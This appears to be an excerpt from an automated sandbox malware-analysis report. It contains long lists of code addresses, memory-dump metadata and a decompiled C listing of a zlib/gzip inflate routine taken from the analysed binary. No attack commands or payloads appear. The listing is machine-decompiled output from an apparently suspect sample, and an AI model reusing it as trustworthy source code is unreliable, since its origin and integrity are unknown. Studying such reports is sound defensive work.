                                                                                                                                                                      0x00408478
                                                                                                                                                                      0x00408478
                                                                                                                                                                      0x00408478
                                                                                                                                                                      0x0040847a
                                                                                                                                                                      0x0040847d
                                                                                                                                                                      0x00408483
                                                                                                                                                                      0x0040849a
                                                                                                                                                                      0x0040849d
                                                                                                                                                                      0x00408485
                                                                                                                                                                      0x00408485
                                                                                                                                                                      0x0040848d
                                                                                                                                                                      0x00408491
                                                                                                                                                                      0x00408491
                                                                                                                                                                      0x004084a1
                                                                                                                                                                      0x004084a5
                                                                                                                                                                      0x004084a8
                                                                                                                                                                      0x004084ae
                                                                                                                                                                      0x004084b0
                                                                                                                                                                      0x004084b0
                                                                                                                                                                      0x004084c5
                                                                                                                                                                      0x004084c5
                                                                                                                                                                      0x004084c5
                                                                                                                                                                      0x004084ae
                                                                                                                                                                      0x004084c9
                                                                                                                                                                      0x004084c9
                                                                                                                                                                      0x004084cf
                                                                                                                                                                      0x004084d1
                                                                                                                                                                      0x004084d3
                                                                                                                                                                      0x004084d3
                                                                                                                                                                      0x004084d9
                                                                                                                                                                      0x004084e3
                                                                                                                                                                      0x004084e7
                                                                                                                                                                      0x004084f0
                                                                                                                                                                      0x004084f0
                                                                                                                                                                      0x004084f6
                                                                                                                                                                      0x004084fa
                                                                                                                                                                      0x004084fc
                                                                                                                                                                      0x004084fd
                                                                                                                                                                      0x004084fd
                                                                                                                                                                      0x004084fd
                                                                                                                                                                      0x00408508
                                                                                                                                                                      0x0040850c
                                                                                                                                                                      0x00408512
                                                                                                                                                                      0x00408512
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040850c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040851d
                                                                                                                                                                      0x00408522
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408528
                                                                                                                                                                      0x00408528
                                                                                                                                                                      0x00408528
                                                                                                                                                                      0x0040852c
                                                                                                                                                                      0x0040852f
                                                                                                                                                                      0x00408531
                                                                                                                                                                      0x00408532
                                                                                                                                                                      0x00408536
                                                                                                                                                                      0x0040853a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040853a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408545
                                                                                                                                                                      0x00408549
                                                                                                                                                                      0x00408606
                                                                                                                                                                      0x00408606
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040854f
                                                                                                                                                                      0x0040854f
                                                                                                                                                                      0x00408552
                                                                                                                                                                      0x00408574
                                                                                                                                                                      0x00408574
                                                                                                                                                                      0x00408578
                                                                                                                                                                      0x0040857c
                                                                                                                                                                      0x00408580
                                                                                                                                                                      0x00408583
                                                                                                                                                                      0x00408586
                                                                                                                                                                      0x0040858c
                                                                                                                                                                      0x0040858e
                                                                                                                                                                      0x00408592
                                                                                                                                                                      0x00408595
                                                                                                                                                                      0x0040859c
                                                                                                                                                                      0x0040859d
                                                                                                                                                                      0x0040859e
                                                                                                                                                                      0x004085a7
                                                                                                                                                                      0x004085a0
                                                                                                                                                                      0x004085a0
                                                                                                                                                                      0x004085a0
                                                                                                                                                                      0x004085ac
                                                                                                                                                                      0x004085b0
                                                                                                                                                                      0x004085b4
                                                                                                                                                                      0x004085b7
                                                                                                                                                                      0x004085ba
                                                                                                                                                                      0x004085ba
                                                                                                                                                                      0x004085c1
                                                                                                                                                                      0x004085c5
                                                                                                                                                                      0x004085c9
                                                                                                                                                                      0x004085cb
                                                                                                                                                                      0x004085cd
                                                                                                                                                                      0x004085d4
                                                                                                                                                                      0x004085d7
                                                                                                                                                                      0x004085db
                                                                                                                                                                      0x004085de
                                                                                                                                                                      0x004085e4
                                                                                                                                                                      0x004085e7
                                                                                                                                                                      0x004085eb
                                                                                                                                                                      0x004085ee
                                                                                                                                                                      0x004085ee
                                                                                                                                                                      0x004085f3
                                                                                                                                                                      0x00408602
                                                                                                                                                                      0x00408602
                                                                                                                                                                      0x00408604
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004085f5
                                                                                                                                                                      0x004085f5
                                                                                                                                                                      0x004085f5
                                                                                                                                                                      0x004085f9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004085f9
                                                                                                                                                                      0x00408554
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408554
                                                                                                                                                                      0x0040855c
                                                                                                                                                                      0x00408560
                                                                                                                                                                      0x00408562
                                                                                                                                                                      0x00408564
                                                                                                                                                                      0x00408565
                                                                                                                                                                      0x00408568
                                                                                                                                                                      0x00408569
                                                                                                                                                                      0x0040856b
                                                                                                                                                                      0x00408572
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408572
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408554
                                                                                                                                                                      0x00408552
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040860c
                                                                                                                                                                      0x00408610
                                                                                                                                                                      0x004086a1
                                                                                                                                                                      0x004086a1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408620
                                                                                                                                                                      0x00408620
                                                                                                                                                                      0x00408623
                                                                                                                                                                      0x00408645
                                                                                                                                                                      0x00408648
                                                                                                                                                                      0x0040869d
                                                                                                                                                                      0x0040869d
                                                                                                                                                                      0x0040869f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408625
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408625
                                                                                                                                                                      0x0040862d
                                                                                                                                                                      0x00408631
                                                                                                                                                                      0x00408633
                                                                                                                                                                      0x00408635
                                                                                                                                                                      0x00408636
                                                                                                                                                                      0x00408639
                                                                                                                                                                      0x0040863a
                                                                                                                                                                      0x0040863c
                                                                                                                                                                      0x00408643
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408643
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408625
                                                                                                                                                                      0x00408623
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004086a7
                                                                                                                                                                      0x004086a7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004086b1
                                                                                                                                                                      0x004086b1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407420
                                                                                                                                                                      0x00408666
                                                                                                                                                                      0x00408666
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408666
                                                                                                                                                                      0x00407ff6
                                                                                                                                                                      0x00407d92
                                                                                                                                                                      0x00407d92
                                                                                                                                                                      0x00407d92
                                                                                                                                                                      0x00407da2
                                                                                                                                                                      0x00407dad
                                                                                                                                                                      0x00407db3
                                                                                                                                                                      0x00407df3
                                                                                                                                                                      0x00407dfb
                                                                                                                                                                      0x00407e52
                                                                                                                                                                      0x00407e52
                                                                                                                                                                      0x00407e5b
                                                                                                                                                                      0x00407ec5
                                                                                                                                                                      0x00407ec9
                                                                                                                                                                      0x00407ecc
                                                                                                                                                                      0x00407ed0
                                                                                                                                                                      0x00407f1e
                                                                                                                                                                      0x00407f23
                                                                                                                                                                      0x00407f4b
                                                                                                                                                                      0x00407f4b
                                                                                                                                                                      0x00407f55
                                                                                                                                                                      0x00407f59
                                                                                                                                                                      0x00407f5c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f25
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f25
                                                                                                                                                                      0x00407f33
                                                                                                                                                                      0x00407f35
                                                                                                                                                                      0x00407f39
                                                                                                                                                                      0x00407f3a
                                                                                                                                                                      0x00407f3d
                                                                                                                                                                      0x00407f42
                                                                                                                                                                      0x00407f43
                                                                                                                                                                      0x00407f49
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f49
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f25
                                                                                                                                                                      0x00407ed2
                                                                                                                                                                      0x00407ed2
                                                                                                                                                                      0x00407ed7
                                                                                                                                                                      0x00407f06
                                                                                                                                                                      0x00407f06
                                                                                                                                                                      0x00407f10
                                                                                                                                                                      0x00407f14
                                                                                                                                                                      0x00407f17
                                                                                                                                                                      0x00407f61
                                                                                                                                                                      0x00407f63
                                                                                                                                                                      0x00407f65
                                                                                                                                                                      0x00407f69
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407ee0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407ee0
                                                                                                                                                                      0x00407eee
                                                                                                                                                                      0x00407ef0
                                                                                                                                                                      0x00407ef4
                                                                                                                                                                      0x00407ef5
                                                                                                                                                                      0x00407ef8
                                                                                                                                                                      0x00407efd
                                                                                                                                                                      0x00407efe
                                                                                                                                                                      0x00407f04
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f04
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407ee0
                                                                                                                                                                      0x00407ed7
                                                                                                                                                                      0x00407e5d
                                                                                                                                                                      0x00407e5d
                                                                                                                                                                      0x00407e5d
                                                                                                                                                                      0x00407e63
                                                                                                                                                                      0x00407e69
                                                                                                                                                                      0x00407e96
                                                                                                                                                                      0x00407e96
                                                                                                                                                                      0x00407e99
                                                                                                                                                                      0x00407e9b
                                                                                                                                                                      0x00407e9f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407ea5
                                                                                                                                                                      0x00407ea5
                                                                                                                                                                      0x00407eaf
                                                                                                                                                                      0x00407eb2
                                                                                                                                                                      0x00407eb5
                                                                                                                                                                      0x00407eb9
                                                                                                                                                                      0x00407ebd
                                                                                                                                                                      0x00407f71
                                                                                                                                                                      0x00407f7e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f84
                                                                                                                                                                      0x00407f84
                                                                                                                                                                      0x00407f89
                                                                                                                                                                      0x00407f8b
                                                                                                                                                                      0x00407f8b
                                                                                                                                                                      0x00407f90
                                                                                                                                                                      0x00407f90
                                                                                                                                                                      0x00407f93
                                                                                                                                                                      0x00407f97
                                                                                                                                                                      0x00407f9c
                                                                                                                                                                      0x00407f9f
                                                                                                                                                                      0x00407f90
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407f89
                                                                                                                                                                      0x00407f7e
                                                                                                                                                                      0x00407e6b
                                                                                                                                                                      0x00407e6b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e70
                                                                                                                                                                      0x00407e7e
                                                                                                                                                                      0x00407e80
                                                                                                                                                                      0x00407e84
                                                                                                                                                                      0x00407e85
                                                                                                                                                                      0x00407e88
                                                                                                                                                                      0x00407e8d
                                                                                                                                                                      0x00407e8e
                                                                                                                                                                      0x00407e94
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e94
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e70
                                                                                                                                                                      0x00407e69
                                                                                                                                                                      0x00407dfd
                                                                                                                                                                      0x00407dfd
                                                                                                                                                                      0x00407e07
                                                                                                                                                                      0x00407e36
                                                                                                                                                                      0x00407e36
                                                                                                                                                                      0x00407e3c
                                                                                                                                                                      0x00407e3e
                                                                                                                                                                      0x00407e45
                                                                                                                                                                      0x00407e4a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e10
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e10
                                                                                                                                                                      0x00407e1e
                                                                                                                                                                      0x00407e20
                                                                                                                                                                      0x00407e21
                                                                                                                                                                      0x00407e24
                                                                                                                                                                      0x00407e25
                                                                                                                                                                      0x00407e27
                                                                                                                                                                      0x00407e2e
                                                                                                                                                                      0x00407e34
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e34
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407e10
                                                                                                                                                                      0x00407e07
                                                                                                                                                                      0x00407db5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407db5
                                                                                                                                                                      0x00407dc3
                                                                                                                                                                      0x00407dc8
                                                                                                                                                                      0x00407dc9
                                                                                                                                                                      0x00407dcc
                                                                                                                                                                      0x00407dd8
                                                                                                                                                                      0x00407dd9
                                                                                                                                                                      0x00407de0
                                                                                                                                                                      0x00407deb
                                                                                                                                                                      0x00407df1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407df1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407db5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407fa6
                                                                                                                                                                      0x00407fac
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407d92
                                                                                                                                                                      0x00407d8c
                                                                                                                                                                      0x00407cc0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407cc0
                                                                                                                                                                      0x00407cc0
                                                                                                                                                                      0x00407cc3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407cc5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407cc5
                                                                                                                                                                      0x00407cd3
                                                                                                                                                                      0x00407cd5
                                                                                                                                                                      0x00407cd6
                                                                                                                                                                      0x00407cd9
                                                                                                                                                                      0x00407cda
                                                                                                                                                                      0x00407cdc
                                                                                                                                                                      0x00407ce3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407ce3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407cc5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407ce5
                                                                                                                                                                      0x00407cf5
                                                                                                                                                                      0x00407cfa
                                                                                                                                                                      0x00407d00
                                                                                                                                                                      0x00407d03
                                                                                                                                                                      0x00407d06
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407cc0
                                                                                                                                                                      0x00407cbb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407c99

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                      • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                                                                                                                                      • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                      • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02417EA6 Relevance: .8, Instructions: 783COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6499a25ff7447b389fc8d0f35bfc94d9811db0526d6ca037196e46e3719a58a5
                                                                                                                                                                      • Instruction ID: eaff09e505ce2849489f3056a41d1a17b0198a417a672944de3b7af12dc46ddf
                                                                                                                                                                      • Opcode Fuzzy Hash: 6499a25ff7447b389fc8d0f35bfc94d9811db0526d6ca037196e46e3719a58a5
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E528171A047529FD708CF29C9906AAB7E1FF88304F044A2EE896D7B80D738E955CF95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004073A0 Relevance: .6, Instructions: 633COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                      			E004073A0() {
				signed char** _t638;
				signed int _t640;
				signed int _t641;
				unsigned int _t667;
				signed char* _t680;
				signed char* _t696;
				signed int* _t714;
				signed int _t716;
				signed char* _t723;
				void* _t730;

				_t638 =  *(_t730 + 4);
				if(_t638 == 0) {
					L330:
					return 0xfffffffe;
				} else {
					_t714 = _t638[7];
					if(_t714 == 0 || _t638[3] == 0 ||  *_t638 == 0 && _t638[1] != 0) {
						goto L330;
					} else {
						if( *_t714 == 0xb) {
							 *_t714 = 0xc;
						}
						_t696 = _t638[1];
						_t667 = _t714[0xe];
						_t723 =  *_t638;
						 *(_t730 + 0x20) = _t638[3];
						_t680 = _t638[4];
						_t640 =  *_t714;
						_t716 = _t714[0xf];
						 *(_t730 + 0x18) = _t680;
						 *(_t730 + 0x10) = _t696;
						 *(_t730 + 0x38) = _t696;
						 *(_t730 + 0x28) = _t680;
						 *(_t730 + 0x30) = 0;
						if(_t640 > 0x1c) {
							L305:
							_t641 = 0xfffffffe;
							goto L306;
						} else {
							do {
								switch( *((intOrPtr*)(_t640 * 4 +  &M004087C4))) {
									case 0:
										if(_t714[2] != 0) {
											if(_t716 >= 0x10) {
												L16:
												if((_t714[2] & 0x00000002) == 0 || _t667 != 0x8b1f) {
													_t642 = _t714[8];
													_t714[4] = 0;
													if(_t642 != 0) {
														 *((intOrPtr*)(_t642 + 0x30)) = 0xffffffff;
													}
													if((_t714[2] & 0x00000001) == 0 || (((_t667 & 0x000000ff) << 8) + (_t667 >> 8)) % 0x1f != 0) {
														( *(_t730 + 0x40))[6] = 0x41d338;
														goto L303;
													} else {
														if((_t667 & 0x0000000f) == 8) {
															_t667 = _t667 >> 4;
															_t693 = (_t667 & 0x0000000f) + 8;
															_t716 = _t716 - 4;
															if(_t693 <= _t714[9]) {
																_push(0);
																_push(0);
																_push(0);
																_t714[5] = 1 << _t693;
																_t647 = E004024A0();
																_t705 =  *(_t730 + 0x1c);
																_t714[6] = _t647;
																 *( *((intOrPtr*)(_t730 + 0x4c)) + 0x30) = _t647;
																 *_t714 =  !(_t667 >> 8) & 0x00000002 | 0x00000009;
																_t730 = _t730 + 0xc;
																_t667 = 0;
																_t716 = 0;
															} else {
																_t705 =  *(_t730 + 0x10);
																goto L302;
															}
														} else {
															_t705 =  *(_t730 + 0x10);
															( *(_t730 + 0x40))[6] = 0x41d338;
															goto L303;
														}
													}
												} else {
													_t714[6] = E00403080(0, 0, 0);
													 *((char*)(_t730 + 0x2c)) = 0x1f;
													 *((char*)(_t730 + 0x2d)) = 0x8b;
													_t650 = E00403080(_t714[6], _t730 + 0x2c, 2);
													_t705 =  *(_t730 + 0x28);
													_t730 = _t730 + 0x18;
													_t667 = 0;
													_t714[6] = _t650;
													_t716 = 0;
													 *_t714 = 1;
												}
												goto L304;
											} else {
												while(_t705 != 0) {
													_t665 = ( *_t723 & 0x000000ff) << _t716;
													_t705 = _t705 - 1;
													_t716 = _t716 + 8;
													_t723 =  &(_t723[1]);
													_t667 = _t667 + _t665;
													 *(_t730 + 0x10) = _t705;
													if(_t716 < 0x10) {
														continue;
													} else {
														goto L16;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											 *_t714 = 0xc;
											goto L304;
										}
										goto L331;
									case 1:
										if(__esi >= 0x10) {
											L32:
											 *(__edi + 0x10) = __ebx;
											if(__bl != 8) {
												goto L302;
											} else {
												if((__ebx & 0x0000e000) == 0) {
													__eax =  *(__edi + 0x20);
													if(__eax != 0) {
														__ebx = __ebx >> 8;
														__ecx = __ebx >> 0x00000008 & 0x00000001;
														 *__eax = __ebx >> 0x00000008 & 0x00000001;
													}
													if(( *(__edi + 0x10) & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __bl;
														__ebx = __ebx >> 8;
														__edx = __esp + 0x20;
														 *(__esp + 0x21) = __bl;
														__eax =  *(__edi + 0x18);
														__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
														__edx =  *(__esp + 0x1c);
														 *(__edi + 0x18) = __eax;
													}
													__ebx = 0;
													__esi = 0;
													 *__edi = 2;
													goto L42;
												} else {
													goto L34;
												}
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L32;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 2:
										if(__esi >= 0x20) {
											L44:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 4) = __ebx;
											}
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __bl;
												__ecx = __ebx;
												__edx = __ebx;
												__ecx = __ebx >> 8;
												__edx = __ebx >> 0x10;
												__ebx = __ebx >> 0x18;
												__eax = __esp + 0x20;
												 *(__esp + 0x21) = __cl;
												 *((char*)(__esp + 0x22)) = __dl;
												 *(__esp + 0x23) = __bl;
												__ecx =  *(__edi + 0x18);
												__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 4);
												__edx =  *(__esp + 0x1c);
												 *(__edi + 0x18) = __eax;
											}
											__ebx = 0;
											__esi = 0;
											 *__edi = 3;
											goto L51;
										} else {
											L42:
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x20) {
													continue;
												} else {
													goto L44;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 3:
										if(__esi >= 0x10) {
											L53:
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												__ebx = __ebx & 0x000000ff;
												 *(__eax + 8) = __ebx & 0x000000ff;
												__ecx =  *(__edi + 0x20);
												__eax = __ebx;
												__eax = __ebx >> 8;
												 *( *(__edi + 0x20) + 0xc) = __eax;
											}
											if(( *(__edi + 0x10) & 0x00000200) != 0) {
												 *(__esp + 0x1c) = __bl;
												__ebx = __ebx >> 8;
												__edx = __esp + 0x20;
												 *(__esp + 0x21) = __bl;
												__eax =  *(__edi + 0x18);
												__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
												__edx =  *(__esp + 0x1c);
												 *(__edi + 0x18) = __eax;
											}
											__ebx = 0;
											__esi = 0;
											 *__edi = 4;
											goto L58;
										} else {
											L51:
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebp =  &(__ebp[1]);
												__ebx = __ebx + __eax;
												 *(__esp + 0x10) = __edx;
												if(__esi < 0x10) {
													continue;
												} else {
													goto L53;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 4:
										L58:
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x10) = 0;
											}
											goto L69;
										} else {
											if(__esi >= 0x10) {
												L62:
												__eax =  *(__edi + 0x20);
												 *(__edi + 0x40) = __ebx;
												if(__eax != 0) {
													 *(__eax + 0x14) = __ebx;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													 *(__esp + 0x1c) = __bl;
													__ebx = __ebx >> 8;
													__ecx = __esp + 0x20;
													 *(__esp + 0x21) = __bl;
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__ebx = 0;
												__esi = 0;
												L69:
												 *__edi = 5;
												goto L70;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x10) {
														continue;
													} else {
														goto L62;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 5:
										L70:
										if(( *(__edi + 0x10) & 0x00000400) == 0) {
											L83:
											 *(__edi + 0x40) = 0;
											 *__edi = 6;
											goto L84;
										} else {
											__eax =  *(__edi + 0x40);
											 *(__esp + 0x14) = __eax;
											if(__eax > __edx) {
												__eax = __edx;
												 *(__esp + 0x14) = __edx;
											}
											if(__eax != 0) {
												__ecx =  *(__edi + 0x20);
												if(__ecx != 0) {
													__ecx =  *(__ecx + 0x10);
													 *(__esp + 0x34) = __ecx;
													if(__ecx != 0) {
														 *(__edi + 0x20) =  *( *(__edi + 0x20) + 0x14);
														__ecx =  *( *(__edi + 0x20) + 0x14) -  *(__edi + 0x40);
														__edx =  *(__edi + 0x20);
														__edx =  *( *(__edi + 0x20) + 0x18);
														 *(__esp + 0x20) = __ecx;
														if(__ecx > __edx) {
															__eax = __edx;
														}
														__edx =  *(__esp + 0x34);
														__eax =  *(__esp + 0x24);
														__edx =  *(__esp + 0x34) +  *(__esp + 0x24);
														__eax = E0040B350(__ebx, __edi, __esi,  *(__esp + 0x34) +  *(__esp + 0x24), __ebp,  *(__esp + 0x24));
														__eax =  *(__esp + 0x20);
														__edx =  *(__esp + 0x1c);
													}
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
													__eax =  *(__esp + 0x20);
												}
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__edi + 0x40) =  *(__edi + 0x40) - __eax;
												 *(__esp + 0x10) = __edx;
											}
											if( *(__edi + 0x40) != 0) {
												goto L312;
											} else {
												goto L83;
											}
										}
										goto L331;
									case 6:
										L84:
										if(( *(__edi + 0x10) & 0x00000800) == 0) {
											__eax =  *(__edi + 0x20);
											if(__eax != 0) {
												 *(__eax + 0x1c) = 0;
											}
											goto L99;
										} else {
											if(__edx == 0) {
												goto L312;
											} else {
												__eax = 0;
												while(1) {
													__ecx = __ebp[__eax] & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax =  *(__edi + 0x20);
													 *(__esp + 0x20) = __ecx;
													if(__eax != 0) {
														__ecx =  *(__eax + 0x1c);
														 *(__esp + 0x34) = __ecx;
														if(__ecx != 0) {
															__ecx =  *(__edi + 0x40);
															if(__ecx <  *((intOrPtr*)(__eax + 0x20))) {
																__edx =  *(__esp + 0x34);
																__al =  *(__esp + 0x20);
																 *( *(__esp + 0x34) + __ecx) = __al;
																 *(__edi + 0x40) =  *(__edi + 0x40) + 1;
																__edx =  *(__esp + 0x10);
															}
														}
													}
													if( *(__esp + 0x20) == 0) {
														break;
													}
													__eax =  *(__esp + 0x14);
													if(__eax < __edx) {
														continue;
													}
													break;
												}
												if(( *(__edi + 0x10) & 0x00000200) != 0) {
													__ecx =  *(__esp + 0x14);
													__edx =  *(__edi + 0x18);
													__eax = E00403080( *(__edi + 0x18), __ebp,  *(__esp + 0x14));
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
												}
												__eax =  *(__esp + 0x14);
												__edx = __edx - __eax;
												__ebp =  &(__ebp[__eax]);
												 *(__esp + 0x10) = __edx;
												if( *(__esp + 0x20) != 0) {
													goto L312;
												} else {
													L99:
													 *(__edi + 0x40) = 0;
													 *__edi = 7;
													goto L100;
												}
											}
										}
										goto L331;
